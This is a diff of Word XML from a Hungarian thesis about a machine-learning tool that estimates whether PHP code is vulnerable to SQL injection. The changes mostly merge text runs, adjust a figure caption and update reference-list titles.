+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>az algoritmus</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>ok</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> szelektálásá</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>hoz.</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -19805,156 +18061,114 @@
       </w:r>
       <w:r>
         <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>A felügyelt tanulás 5 fő algoritmusát hasonlítottam össze ezzel a metrikával</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:firstLine="567"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="749075B4" wp14:editId="46FF52CD">
+            <wp:extent cx="2660650" cy="1497248"/>
+            <wp:effectExtent l="0" t="0" r="6350" b="8255"/>
+            <wp:docPr id="2" name="Kép 2" descr="A képen asztal látható&#10;&#10;Automatikusan generált leírás"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="2" name="Kép 2" descr="A képen asztal látható&#10;&#10;Automatikusan generált leírás"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId17">
+                      <a:extLst>
+                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                        </a:ext>
+                      </a:extLst>
+                    </a:blip>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="2667178" cy="1500921"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:firstLine="567"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">3.5-ös ábra: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">a </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
           <w:highlight w:val="yellow"/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>\</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+        <w:t>\machine_learning_app</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:highlight w:val="yellow"/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>machine_learning_app</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>\</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>trainer.py</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>-</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>on</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> be</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">lül </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>hajtja végre a program legfőbb feladatát: betanítja a</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> választott </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">algoritmust és </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>ad</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">egy </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">becslést </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>egy ismeretlen</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> PHP</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">kód SQL </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>injectionbeli</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> sebezhetőségével kapcsolatban.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
+        <w:t>\trainer.py</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> kimenete</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -19969,6 +18183,129 @@
     </w:p>
     <w:p>
       <w:pPr>
+        <w:pStyle w:val="Listaszerbekezds"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="30"/>
+        </w:numPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="1134" w:hanging="283"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>classifier:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Metódus, amely </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>a tanulásért felelős 106.sor</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>t</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>használja fel</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> az adatkészlet tanításához elkülönített részét a két állapot</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>megkülönböztetésére</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>,</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> megalkotva ezzel a program </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>gépi tanulási modell</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>jét.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Listaszerbekezds"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="30"/>
+        </w:numPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="1134" w:hanging="283"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>classifier2:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:spacing w:line="360" w:lineRule="auto"/>
         <w:ind w:firstLine="567"/>
         <w:jc w:val="both"/>
@@ -19976,6 +18313,142 @@
           <w:lang w:val="hu-HU"/>
         </w:rPr>
       </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>A modell</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">hez </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">utolsó lépésként </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>a grafikus felület biztosít ismeretlen adatokat</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>, amelyet</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>a</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>\machine_learning_app</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>\src\main</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> két részre oszt</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">a </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">grafikus felület </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">szerkezetét leíró </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>resources</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> és a viselkedését leíró </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>java</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> mapp</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>ára.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Adatok biztosításán kívül továbbá az eredmények is itt kerülnek kiíratásra. </w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -19986,14 +18459,6 @@
           <w:lang w:val="hu-HU"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>diagrams</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -20008,7 +18473,7 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>grafikus felület</w:t>
+        <w:t>diagrams</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -20296,59 +18761,13 @@
           <w:lang w:val="hu-HU"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>Error</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>Based</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> SQL Injection (</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>SQLi</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>)</w:t>
+        <w:t>Error Based SQL Injection (SQLi)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -20398,77 +18817,13 @@
           <w:lang w:val="hu-HU"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>Beginner</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>Guide</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>to</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> SQL Injection Boolean </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>Based</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> (Part 2)</w:t>
+        <w:t>Beginner Guide to SQL Injection Boolean Based (Part 2)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -20524,61 +18879,7 @@
           <w:szCs w:val="20"/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">Time </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>Based</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>Blind</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> SQL Injection (</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>SQLi</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>)</w:t>
+        <w:t>Time Based Blind SQL Injection (SQLi)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -20628,106 +18929,14 @@
           <w:lang w:val="hu-HU"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>Blind</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Out-of-</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>band</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> SQL Injection </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>vulnerability</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> testing </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>added</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>to</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>AcuMonitor</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>Blind Out-of-band SQL Injection vulnerability testing added to AcuMonitor</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -20782,54 +18991,8 @@
           <w:szCs w:val="20"/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">Mike </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>Shema</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 2012. SQL Injection &amp; Data </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>Store</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>Manipulation</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>Mike Shema 2012. SQL Injection &amp; Data Store Manipulation</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -20884,54 +19047,8 @@
           <w:szCs w:val="20"/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">SQL Injection </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>Prevention</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>Cheat</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>Sheet</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>SQL Injection Prevention Cheat Sheet</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -20986,36 +19103,8 @@
           <w:szCs w:val="20"/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">Alex </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>Kaechele</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 2018. </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>Classification</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>Alex Kaechele 2018. Classification</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -21363,7 +19452,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId17" cstate="print">
+                    <a:blip r:embed="rId18" cstate="print">
                       <a:extLst>
